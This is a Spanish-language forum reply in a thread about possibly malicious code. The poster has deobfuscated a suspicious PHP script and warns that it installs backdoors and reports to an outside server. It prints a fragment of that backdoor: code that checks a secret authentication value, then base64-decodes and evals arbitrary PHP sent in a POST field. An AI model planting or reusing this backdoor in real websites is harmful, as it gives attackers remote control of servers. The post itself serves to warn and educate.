Tema: Posible codigo malicioso
Ver Mensaje Individual
  #6 (permalink)  
Antiguo 07/10/2013, 14:53
Erick_MD9
 
Fecha de Ingreso: julio-2013
Ubicación: México
Mensajes: 361
Antigüedad: 10 años, 8 meses
Puntos: 55
Respuesta: Posible codigo malicioso
Hola,
Me entretuve un rato desofuscando ese código.
Les dejo una parte, solo para que tengamos presente lo que un codigo ofuscado puede contener.

Al ejecutarse el script, genera back doors para tener
un amplio control sobre el servidor atacado.
¡¡CUIDADO!!
Toda la info le llega a 'http://' ' oson' '.in' ¡¡Cuidado con este servidor!!

Código PHP: 
Ver original
  1. if (@$_SERVER["HTTP_Y_AUTH"]==$QO000O or @$_POST["Y_AUTH"]==$QO000O){ 
  2.             echo "\r\n"; 
  3.             @output('versio', $IllIIl.'-'.$II1llI.'-php'); 
  4.             if ($II1I11=base64_decode(@$_POST['EXECPHP'])){ 
  5.                 @eval($II1I11);
  6.                 echo "\r\n"; @output('out', 'ok'); 
  7.             } 
  8.             exit(0); 
  9.         }


Saludos